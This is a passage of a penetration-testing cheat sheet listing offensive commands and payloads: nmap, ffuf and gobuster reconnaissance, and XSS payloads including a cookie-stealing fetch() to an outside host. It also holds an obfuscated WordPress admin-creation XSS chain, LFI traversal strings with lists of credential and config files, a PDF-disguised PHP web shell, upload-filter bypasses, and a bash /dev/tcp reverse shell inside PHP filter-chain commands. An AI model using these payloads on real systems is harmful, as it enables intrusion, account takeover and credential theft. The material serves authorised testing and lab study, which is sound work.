41557034\nSTAT time 1519734962\n\nsudo nmap \u003cRHOST\u003e -p 11211 -sU -sS --script memcached-info\n\nstats items\nstats cachedump 1 0\nget link\nget file\nget user\nget passwd\nget account\nget username\nget password\n```\n\n#### NetBIOS\n\n```c\nnbtscan \u003cRHOST\u003e\nnmblookup -A \u003cRHOST\u003e\n```\n\n#### Nmap\n\n```c\nsudo nmap -A -T4 -sC -sV -p- \u003cRHOST\u003e\nsudo nmap -sV -sU \u003cRHOST\u003e\nsudo nmap -A -T4 -sC -sV --script vuln \u003cRHOST\u003e\nsudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery \u003cRHOST\u003e\nsudo nmap -sC -sV -p- --scan-delay 5s \u003cRHOST\u003e\nsudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' \u003cRHOST\u003e\nls -lh /usr/share/nmap/scripts/*ssh*\nlocate -r '\\.nse$' | xargs grep categories | grep categories | grep 'default\\|version\\|safe' | grep smb\n```\n\n#### Port Scanning\n\n```c\nfor p in {1..65535}; do nc -vn \u003cRHOST\u003e $p -w 1 -z \u0026 done 2\u003e \u003cFILE\u003e.txt\n```\n\n```c\nexport ip=\u003cRHOST\u003e; for port in $(seq 1 65535); do timeout 0.01 bash -c \"\u003c/dev/tcp/$ip/$port \u0026\u0026 echo The port $port is open || echo The Port $port is closed \u003e /dev/null\" 2\u003e/dev/null || echo Connection Timeout \u003e /dev/null; done\n```\n\n#### snmpwalk\n\n```c\nsnmpwalk -c public -v1 \u003cRHOST\u003e\nsnmpwalk -v2c -c public \u003cRHOST\u003e 1.3.6.1.2.1.4.34.1.3\nsnmpwalk -v2c -c public \u003cRHOST\u003e .1\nsnmpwalk -v2c -c public \u003cRHOST\u003e nsExtendObjects\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.25\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.4.2.1.2\nsnmpwalk -c public -v1 \u003cRHOST\u003e .1.3.6.1.2.1.1.5\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.3.1.1\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.4.1.77.1.2.27\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.6.13.1.3\nsnmpwalk -c public -v1 \u003cRHOST\u003e 1.3.6.1.2.1.25.6.3.1.2\n```\n\n### Web Application Analysis\n\n#### Burp Suite\n\n```c\nCtrl+r          // Sending request to repeater\nCtrl+i          // Sending request to intruder\nCtrl+Shift+b    // base64 encoding\nCtrl+Shift+u    // URL decoding\n```\n\n#### Set Proxy Environment Variables\n\n```c\nexport HTTP_PROXY=http://localhost:8080\nexport HTTPS_PROXY=https://localhost:8080\n```\n\n#### cadaver\n\n```c\ncadaver http://\u003cRHOST\u003e/\u003cWEBDAV_DIRECTORY\u003e/\n```\n\n```c\ndav:/\u003cWEBDAV_DIRECTORY\u003e/\u003e cd C\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e ls\ndav:/\u003cWEBDAV_DIRECTORY\u003e/C/\u003e put \u003cFILE\u003e\n```\n\n#### Cross-Site Scripting (XSS)\n\n```c\n\u003csCrIpt\u003ealert(1)\u003c/ScRipt\u003e\n\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cscript\u003ealert(document.cookies)\u003c/script\u003e\n\u003cscript\u003edocument.querySelector('#foobar-title').textContent = '\u003cTEXT\u003e'\u003c/script\u003e\n\u003cscript\u003efetch('https://\u003cRHOST\u003e/steal?cookie=' + btoa(document.cookie));\u003c/script\u003e\n\u003cscript\u003euser.changeEmail('user@domain');\u003c/script\u003e\n\u003ciframe src=file:///etc/passwd height=1000px width=1000px\u003e\u003c/iframe\u003e\n\u003cimg src='http://\u003cRHOST\u003e'/\u003e\n```\n\n##### XSS client-Side Attack\n\n###### Request Example\n\n```c\n\u003ca href=\"http://\u003cRHOST\u003e/send_btc?account=\u003cUSERNAME\u003e\u0026amount=100000\"\"\u003efoobar!\u003c/a\u003e\n```\n\n###### Get nonce\n\n```c\nvar ajaxRequest = new XMLHttpRequest();\nvar requestURL = \"/wp-admin/user-new.php\";\nvar nonceRegex = /ser\" value=\"([^\"]*?)\"/g;\najaxRequest.open(\"GET\", requestURL, false);\najaxRequest.send();\nvar nonceMatch = nonceRegex.exec(ajaxRequest.responseText);\nvar nonce = nonceMatch[1];\n```\n\n###### Update Payload Script\n\n```c\nvar params = \"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";\najaxRequest = new XMLHttpRequest();\najaxRequest.open(\"POST\", requestURL, true);\najaxRequest.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\najaxRequest.send(params);\n```\n\n###### Compress Payload Script\n\n\u003e https://jscompress.com/\n\n```c\nvar params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);\n```\n\n##### Encoding Function\n\n```c\nfunction encode_to_javascript(string) {\n            var input = string\n            var output = '';\n            for(pos = 0; pos \u003c input.length; pos++) {\n                output += input.charCodeAt(pos);\n                if(pos != (input.length - 1)) {\n                    output += \",\";\n                }\n            }\n            return output;\n        }\n        \nlet encoded = encode_to_javascript('var params=\"action=createuser\u0026_wpnonce_create-user=\"+nonce+\"\u0026user_login=\u003cUSERNAME\u003e\u0026email=\u003cEMAIL\u003e\u0026pass1=\u003cPASSWORD\u003e\u0026pass2=\u003cPASSWORD\u003e\u0026role=administrator\";ajaxRequest=new XMLHttpRequest,ajaxRequest.open(\"POST\",requestURL,!0),ajaxRequest.setRequestHeader(\"Content-Type\",\"application/x-www-form-urlencoded\"),ajaxRequest.send(params);')\nconsole.log(encoded)\n```\n\n###### Encoded Payload\n\n```c\n118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9\n```\n\n###### Execution\n\n```c\ncurl -i http://\u003cRHOST\u003e --user-agent \"\u003cscript\u003eeval(String.fromCharCode(118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9\n))\u003c/script\u003e\" --proxy 127.0.0.1:8080\n```\n\n#### ffuf\n\n```c\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fs \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ --fw \u003cNUMBER\u003e -mc all\nffuf -w /usr/share/wordlists/dirb/common.txt -u http://\u003cRHOST\u003e/FUZZ -mc 200,204,301,302,307,401 -o results.txt\nffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://\u003cRHOST\u003e/ -H \"Host: FUZZ.\u003cRHOST\u003e\" -fs 185\nffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http://\u003cRHOST\u003e/backups/backup_2020070416FUZZ.zip\n```\n\n##### API Fuzzing\n\n```c\nffuf -u https://\u003cRHOST\u003e/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412\n```\n\n##### Searching for LFI\n\n```c\nffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://\u003cRHOST\u003e/admin../admin_staging/index.php?page=FUZZ -fs 15349\n```\n\n##### Fuzzing with PHP Session ID\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt  -u \"http://\u003cRHOST\u003e/admin/FUZZ.php\" -b \"PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp\" -fw 2644\n```\n\n##### Recursion\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/basic/FUZZ -recursion\n```\n\n##### File Extensions\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://\u003cRHOST\u003e/cd/ext/logs/FUZZ -e .log\n```\n\n##### Rate Limiting\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http://\u003cRHOST\u003e/cd/rate/FUZZ -mc 200,429\n```\n\n##### Virtual Host Discovery\n\n```c\nffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H \"Host: FUZZ.\u003cRHOST\u003e\" -u http://\u003cRHOST\u003e -fs 1495\n```\n\n##### Massive File Extension Discovery\n\n```c\nffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://\u003cRHOST\u003e/FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip\n```\n\n#### GitTools\n\n```c\n./gitdumper.sh http://\u003cRHOST\u003e/.git/ /PATH/TO/FOLDER\n./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/\n```\n\n#### Gobuster\n\n```c\n-e    // extended mode that renders the full url\n-k    // skip ssl certificate validation\n-r    // follow cedirects\n-s    // status codes\n-b    // exclude status codes\n-k            // ignore certificates\n--wildcard    // set wildcard option\n\n$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/\n$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://\u003cRHOST\u003e/ -x php\n$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://\u003cRHOST\u003e/ -x php,txt,html,js -e -s 200\n$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://\u003cRHOST\u003e:\u003cRPORT\u003e/ -b 200 -k --wildcard\n```\n\n##### Common File Extensions\n\n```c\ntxt,bak,php,html,js,asp,aspx\n```\n\n##### Common Picture Extensions\n\n```c\npng,jpg,jpeg,gif,bmp\n```\n\n##### POST Requests\n\n```c\ngobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://\u003cRHOST\u003e/api/ -e -s 200\n```\n\n##### DNS Recon\n\n```c\ngobuster dns -d \u003cRHOST\u003e -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt\ngobuster dns -d \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\n```\n\n##### VHost Discovery\n\n```c\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt\ngobuster vhost -u \u003cRHOST\u003e -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain\n```\n\n##### Specifiy User Agent\n\n```c\ngobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://\u003cRHOST\u003e/ -a Linux\n```\n\n#### Local File Inclusion (LFI)\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e.php?file=../../../../../../../../etc/passwd\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e/php?file=../../../../../../../../../../etc/passwd\n```\n##### Until php 5.3\n\n```c\nhttp://\u003cRHOST\u003e/\u003cFILE\u003e/php?file=../../../../../../../../../../etc/passwd%00\n```\n\n##### Null Byte\n\n```c\n%00\n0x00\n```\n\n##### Encoded Traversal Strings\n\n```c\n../\n..\\\n..\\/\n%2e%2e%2f\n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n..././\n...\\.\\\n```\n\n##### php://filter Wrapper\n\n\u003e https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion\n\n\u003e https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter\n\n```c\nurl=php://filter/convert.base64-encode/resource=file:////var/www/\u003cRHOST\u003e/api.php\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=index\nhttp://\u003cRHOST\u003e/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd\nbase64 -d \u003cFILE\u003e.php\n```\n\n##### Django, Rails, or Node.js Web Application Header Values\n\n```c\nAccept: ../../../../.././../../../../etc/passwd{{\nAccept: ../../../../.././../../../../etc/passwd{%0D\nAccept: ../../../../.././../../../../etc/passwd{%0A\nAccept: ../../../../.././../../../../etc/passwd{%00\nAccept: ../../../../.././../../../../etc/passwd{%0D{{\nAccept: ../../../../.././../../../../etc/passwd{%0A{{\nAccept: ../../../../.././../../../../etc/passwd{%00{{\n```\n\n##### Linux Files\n\n```c\n/app/etc/local.xml\n/etc/passwd\n/etc/shadow\n/etc/aliases\n/etc/anacrontab\n/etc/apache2/apache2.conf\n/etc/apache2/httpd.conf\n/etc/apache2/sites-enabled/000-default.conf\n/etc/at.allow\n/etc/at.deny\n/etc/bashrc\n/etc/bootptab\n/etc/chrootUsers\n/etc/chttp.conf\n/etc/cron.allow\n/etc/cron.deny\n/etc/crontab\n/etc/cups/cupsd.conf\n/etc/exports\n/etc/fstab\n/etc/ftpaccess\n/etc/ftpchroot\n/etc/ftphosts\n/etc/groups\n/etc/grub.conf\n/etc/hosts\n/etc/hosts.allow\n/etc/hosts.deny\n/etc/httpd/access.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/access_log\n/etc/httpd/logs/access.log\n/etc/httpd/logs/error_log\n/etc/httpd/logs/error.log\n/etc/httpd/php.ini\n/etc/httpd/srm.conf\n/etc/inetd.conf\n/etc/inittab\n/etc/issue\n/etc/knockd.conf\n/etc/lighttpd.conf\n/etc/lilo.conf\n/etc/logrotate.d/ftp\n/etc/logrotate.d/proftpd\n/etc/logrotate.d/vsftpd.log\n/etc/lsb-release\n/etc/motd\n/etc/modules.conf\n/etc/motd\n/etc/mtab\n/etc/my.cnf\n/etc/my.conf\n/etc/mysql/my.cnf\n/etc/network/interfaces\n/etc/networks\n/etc/npasswd\n/etc/passwd\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/cgi/php.ini\n/etc/php4/apache2/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/apache/php.ini\n/etc/php/apache2/php.ini\n/etc/php/apache/php.ini\n/etc/php/cgi/php.ini\n/etc/php.ini\n/etc/php/php4/php.ini\n/etc/php/php.ini\n/etc/printcap\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/proftpd.conf\n/etc/pure-ftpd.conf\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/putreftpd.pdb\n/etc/redhat-release\n/etc/resolv.conf\n/etc/samba/smb.conf\n/etc/snmpd.conf\n/etc/ssh/ssh_config\n/etc/ssh/sshd_config\n/etc/ssh/ssh_host_dsa_key\n/etc/ssh/ssh_host_dsa_key.pub\n/etc/ssh/ssh_host_key\n/etc/ssh/ssh_host_key.pub\n/etc/sysconfig/network\n/etc/syslog.conf\n/etc/termcap\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.conf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/logs/pure-ftpd.log\n/logs/security_debug_log\n/logs/security_log\n/opt/lampp/etc/httpd.conf\n/opt/xampp/etc/php.ini\n/proc/cmdline\n/proc/cpuinfo\n/proc/filesystems\n/proc/interrupts\n/proc/ioports\n/proc/meminfo\n/proc/modules\n/proc/mounts\n/proc/net/arp\n/proc/net/tcp\n/proc/net/udp\n/proc/\u003cPID\u003e/cmdline\n/proc/\u003cPID\u003e/maps\n/proc/sched_debug\n/proc/self/cwd/app.py\n/proc/self/environ\n/proc/self/net/arp\n/proc/stat\n/proc/swaps\n/proc/version\n/root/anaconda-ks.cfg\n/usr/etc/pure-ftpd.conf\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/local/apache/conf/modsec.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/log\n/usr/local/apache/logs\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/access.log\n/usr/local/apache/audit_log\n/usr/local/apache/error_log\n/usr/local/apache/error.log\n/usr/local/cpanel/logs\n/usr/local/cpanel/logs/access_log\n/usr/local/cpanel/logs/error_log\n/usr/local/cpanel/logs/license_log\n/usr/local/cpanel/logs/login_log\n/usr/local/cpanel/logs/stats_log\n/usr/local/etc/httpd/logs/access_log\n/usr/local/etc/httpd/logs/error_log\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/lib/php.ini\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.ini\n/usr/local/php/lib/php.ini\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdn\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/www/logs/httpd_log\n/usr/local/Zend/etc/php.ini\n/usr/sbin/pure-config.pl\n/var/adm/log/xferlog\n/var/apache2/config.inc\n/var/apache/logs/access_log\n/var/apache/logs/error_log\n/var/cpanel/cpanel.config\n/var/lib/mysql/my.cnf\n/var/lib/mysql/mysql/user.MYD\n/var/local/www/conf/php.ini\n/var/log/apache2/access_log\n/var/log/apache2/access.log\n/var/log/apache2/error_log\n/var/log/apache2/error.log\n/var/log/apache/access_log\n/var/log/apache/access.log\n/var/log/apache/error_log\n/var/log/apache/error.log\n/var/log/apache-ssl/access.log\n/var/log/apache-ssl/error.log\n/var/log/auth.log\n/var/log/boot\n/var/htmp\n/var/log/chttp.log\n/var/log/cups/error.log\n/var/log/daemon.log\n/var/log/debug\n/var/log/dmesg\n/var/log/dpkg.log\n/var/log/exim_mainlog\n/var/log/exim/mainlog\n/var/log/exim_paniclog\n/var/log/exim.paniclog\n/var/log/exim_rejectlog\n/var/log/exim/rejectlog\n/var/log/faillog\n/var/log/ftplog\n/var/log/ftp-proxy\n/var/log/ftp-proxy/ftp-proxy.log\n/var/log/httpd-access.log\n/var/log/httpd/access_log\n/var/log/httpd/access.log\n/var/log/httpd/error_log\n/var/log/httpd/error.log\n/var/log/httpsd/ssl.access_log\n/var/log/httpsd/ssl_log\n/var/log/kern.log\n/var/log/lastlog\n/var/log/lighttpd/access.log\n/var/log/lighttpd/error.log\n/var/log/lighttpd/lighttpd.access.log\n/var/log/lighttpd/lighttpd.error.log\n/var/log/mail.info\n/var/log/mail.log\n/var/log/maillog\n/var/log/mail.warn\n/var/log/message\n/var/log/messages\n/var/log/mysqlderror.log\n/var/log/mysql.log\n/var/log/mysql/mysql-bin.log\n/var/log/mysql/mysql.log\n/var/log/mysql/mysql-slow.log\n/var/log/proftpd\n/var/log/pureftpd.log\n/var/log/pure-ftpd/pure-ftpd.log\n/var/log/secure\n/var/log/vsftpd.log\n/var/log/wtmp\n/var/log/xferlog\n/var/log/yum.log\n/var/mysql.log\n/var/run/utmp\n/var/spool/cron/crontabs/root\n/var/webmin/miniserv.log\n/var/www/html\u003cVHOST\u003e/__init__.py\n/var/www/html/db_connect.php\n/var/www/html/utils.php\n/var/www/log/access_log\n/var/www/log/error_log\n/var/www/logs/access_log\n/var/www/logs/error_log\n/var/www/logs/access.log\n/var/www/logs/error.log\n~/.atfp_history\n~/.bash_history\n~/.bash_logout\n~/.bash_profile\n~/.bashrc\n~/.gtkrc\n~/.login\n~/.logout\n~/.mysql_history\n~/.nano_history\n~/.php_history\n~/.profile\n~/.ssh/authorized_keys\n~/.ssh/id_dsa\n~/.ssh/id_dsa.pub\n~/.ssh/id_rsa\n~/.ssh/id_rsa.pub\n~/.ssh/identity\n~/.ssh/identity.pub\n~/.viminfo\n~/.wm_style\n~/.Xdefaults\n~/.xinitrc\n~/.Xresources\n~/.xsession\n```\n\n##### Windows Files\n\n```c\nC:/Users/Administrator/NTUser.dat\nC:/Documents and Settings/Administrator/NTUser.dat\nC:/apache/logs/access.log\nC:/apache/logs/error.log\nC:/apache/php/php.ini\nC:/boot.ini\nC:/inetpub/wwwroot/global.asa\nC:/MySQL/data/hostname.err\nC:/MySQL/data/mysql.err\nC:/MySQL/data/mysql.log\nC:/MySQL/my.cnf\nC:/MySQL/my.ini\nC:/php4/php.ini\nC:/php5/php.ini\nC:/php/php.ini\nC:/Program Files/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/conf/httpd.conf\nC:/Program Files/Apache Group/Apache/logs/access.log\nC:/Program Files/Apache Group/Apache/logs/error.log\nC:/Program Files/FileZilla Server/FileZilla Server.xml\nC:/Program Files/MySQL/data/hostname.err\nC:/Program Files/MySQL/data/mysql-bin.log\nC:/Program Files/MySQL/data/mysql.err\nC:/Program Files/MySQL/data/mysql.log\nC:/Program Files/MySQL/my.ini\nC:/Program Files/MySQL/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err\nC:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log\nC:/Program Files/MySQL/MySQL Server 5.0/my.cnf\nC:/Program Files/MySQL/MySQL Server 5.0/my.ini\nC:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf\nC:/Program Files (x86)/Apache Group/Apache/conf/access.log\nC:/Program Files (x86)/Apache Group/Apache/conf/error.log\nC:/Program Files (x86)/FileZilla Server/FileZilla Server.xml\nC:/Program Files (x86)/xampp/apache/conf/httpd.conf\nC:/WINDOWS/php.ini\nC:/WINDOWS/Repair/SAM\nC:/Windows/repair/system\nC:/Windows/repair/software\nC:/Windows/repair/security\nC:/WINDOWS/System32/drivers/etc/hosts\nC:/Windows/win.ini\nC:/WINNT/php.ini\nC:/WINNT/win.ini\nC:/xampp/apache/bin/php.ini\nC:/xampp/apache/logs/access.log\nC:/xampp/apache/logs/error.log\nC:/Windows/Panther/Unattend/Unattended.xml\nC:/Windows/Panther/Unattended.xml\nC:/Windows/debug/NetSetup.log\nC:/Windows/system32/config/AppEvent.Evt\nC:/Windows/system32/config/SecEvent.Evt\nC:/Windows/system32/config/default.sav\nC:/Windows/system32/config/security.sav\nC:/Windows/system32/config/software.sav\nC:/Windows/system32/config/system.sav\nC:/Windows/system32/config/regback/default\nC:/Windows/system32/config/regback/sam\nC:/Windows/system32/config/regback/security\nC:/Windows/system32/config/regback/system\nC:/Windows/system32/config/regback/software\nC:/Program Files/MySQL/MySQL Server 5.1/my.ini\nC:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml\nC:/Windows/System32/inetsrv/config/applicationHost.config\nC:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log\n```\n\n#### PDF PHP Inclusion\n\nCreate a file with a PDF header, which contains PHP code.\n\n```c\n%PDF-1.4\n\n\u003c?php\n    system($_GET[\"cmd\"]);\n?\u003e\n```\n\n```c\nhttp://\u003cRHOST\u003e/index.php?page=uploads/\u003cFILE\u003e.pdf%00\u0026cmd=whoami\n```\n\n#### PHP Upload Filter Bypasses\n\n```c\n.sh\n.cgi\n.inc\n.txt\n.pht\n.phtml\n.phP\n.Php\n.php3\n.php4\n.php5\n.php7\n.pht\n.phps\n.phar\n.phpt\n.pgif\n.phtml\n.phtm\n.php%00.jpeg\n```\n\n```c\n\u003cFILE\u003e.php%20\n\u003cFILE\u003e.php%0d%0a.jpg\n\u003cFILE\u003e.php%0a\n\u003cFILE\u003e.php.jpg\n\u003cFILE\u003e.php%00.gif\n\u003cFILE\u003e.php\\x00.gif\n\u003cFILE\u003e.php%00.png\n\u003cFILE\u003e.php\\x00.png\n\u003cFILE\u003e.php%00.jpg\n\u003cFILE\u003e.php\\x00.jpg\nmv \u003cFILE\u003e.jpg \u003cFILE\u003e.php\\x00.jpg\n```\n\n#### PHP Filter Chain Generator\n\n\u003e https://github.com/synacktiv/php_filter_chain_generator\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\npython3 php_filter_chain_generator.py --chain \"\u003c?php echo shell_exec(id); ?\u003e\"\npython3 php_filter_chain_generator.py --chain \"\"\"\u003c?php echo shell_exec(id); ?\u003e\"\"\"\npython3 php_filter_chain_generator.py --chain \"\"\"\"\u003c?php exec(\"\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261'\"\");?\u003e\"\"\"\"\npython3 php_filter_chain_generator.py --chain \"\"\"\"\u003c?php exec(\"\"/bin/bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cLHOST\u003e/\u003cLPORT\u003e 0\u003e\u00261'\"\");?\u003e\"\"\"\"\n```\n\n```c\nhttp://\u003cRHOST\u003e/?page=php://filter/convert.base64-decode/resource=PD9waHAgZWNobyBzaGVsbF9leGVjKGlkKTsgPz4\n```\n\n```c\npython3 php_filter_chain_generator.py --chain '\u003c?= exec($_GET[0]); ?\u003e'\n[+] The following gadget chain will generate the following code : \u003c?= exec($_GET[0]); ?\u003e (base64 value: PD89IGV4ZWMoJF9HRVRbMF0pOyA/Pg)\nphp://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|\u003c--- SNIP 